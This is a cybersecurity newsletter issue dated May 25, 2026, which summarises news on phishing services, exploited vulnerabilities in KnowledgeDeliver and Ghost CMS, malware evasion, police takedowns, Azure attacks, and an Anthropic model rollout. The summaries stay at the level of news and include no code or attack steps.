Daily Security Briefing #265

May 25, 2026 | Read Online

Chinese PhaaS growth, KnowledgeDeliver vulnerability exploited, Netherlands seizes servers, and AI model security risks…

Executive Summary

Cybersecurity threats continue to evolve with malicious actors adapting to disruptions. Recent developments include the growth of Chinese-language phishing services (PhaaS), exploitation of a critical vulnerability in KnowledgeDeliver, and the seizure of 800 servers by Dutch authorities. Additionally, concerns are rising over AI model security risks, particularly with Anthropic’s restricted Claude Mythos model potentially being integrated into Claude Code.

Top Articles

2 PhaaS 2 Furious: The Evolution of Chinese-language Phishing Services Google Threat Intelligence Group analyzed a dozen current PhaaS offerings in the Chinese underground, all of them mature services and many likely tied intricately to the broader criminal ecosystem. These services lower the barrier to entry for Chinese cyber criminals. Google Cloud Blog

Exploitation of KnowledgeDeliver via ViewState Deserialization Vulnerability A critical vulnerability in KnowledgeDeliver allowed unauthenticated Remote Code Execution (RCE). An unknown threat actor leveraged this access to inject malicious code into the LMS platform, with the goal of compromising sensitive data. Google Cloud Blog

Netherlands Seizes 800 Servers, Arrests 2 for Aiding Cyberattacks Authorities in the Netherlands have arrested the co-owners of two related Internet hosting companies for operating IT infrastructure used by Russia to carry out cyberattacks. The two men were the focus of a 2025 KrebsOnSecurity story about how their hosting companies had assumed control over the technical infrastructure of Stark Industries Solutions. KrebsOnSecurity

InvisibleFerret Malware Uses .pyd and .so Files to Evade Script Detection A North Korea-linked threat group, Void Dokkaebi, has upgraded its malware delivery techniques by converting Python-based InvisibleFerret into compiled binary modules. This makes it harder for defenders to detect through static analysis and signature-based tools. GBHackers

Italian Authorities Dismantle CINEMAGOAL App Enabling Unauthorised Access to Streaming Platforms Italian law enforcement agencies have dismantled a sophisticated piracy operation centered around the CINEMAGOAL application, which enabled unauthorized access to premium streaming platforms. The operation was led by the Financial Police in Ravenna under the direction of the Bologna Public Prosecutor’s Office. GBHackers

Telegram Channels Become Marketplaces for Verified Bank and Fintech Mule Accounts Threat actors are exploiting Telegram channels and dark web forums to sell verified bank accounts and fintech wallets. According to recent threat intelligence from KELA, cybercriminals are building resilient laundering infrastructures using stolen identities, AI-assisted onboarding, and compromised accounts. CyberPress

25th May – Threat Intelligence Report Check Point’s Threat Intelligence Bulletin highlights the latest discoveries in cyber research for the week of 25th May. TOP ATTACKS AND BREACHES include a breach at 7-Eleven, where ShinyHunters claimed responsibility and said it stole more than 600,000 Salesforce records containing personal data. Check Point Research

Weekly Recap: Linux Flaws, Defender 0-Days, Router Botnets, and Supply Chain Chaos A weekly recap of recent cybersecurity events, including the exploitation of Linux flaws, defender 0-days, router botnets, and supply chain chaos. The Hacker News

Hackers Abuse Azure RBAC Permissions To Steal Key Vault Secrets Microsoft Threat Intelligence recently identified a sophisticated cyberattack by the threat actor Storm-2949, focused on massive data exfiltration from Microsoft 365 and Azure environments. The attackers weaponized legitimate cloud management tools and Azure role-based access control (RBAC) permissions to achieve lateral movement. CyberPress

Ghost CMS CVE-2026-26980 Exploited to Hijack 700+ Sites for ClickFix Attacks Threat actors are exploiting a recently disclosed critical security flaw in Ghost CMS to inject malicious JavaScript code with an aim to fuel ClickFix attacks. According to QiAnXin XLab, the activity involves the exploitation of CVE-2026-26980 (CVSS score: 9.4). The Hacker News

Anthropic’s restricted Claude Mythos model may be coming to Claude Code Anthropic appears to be preparing for the public rollout of the Mythos model, which was announced in April as a restricted model that poses major security risks to private and public software. BleepingComputer

AI Transparency: This newsletter uses AI to curate, rank, and summarize cybersecurity content from leading industry blogs. All articles link directly to original authors. Executive summaries are AI-generated based on article content. I curate the sources and deliver the digest—the original authors deserve the credit for their excellent work.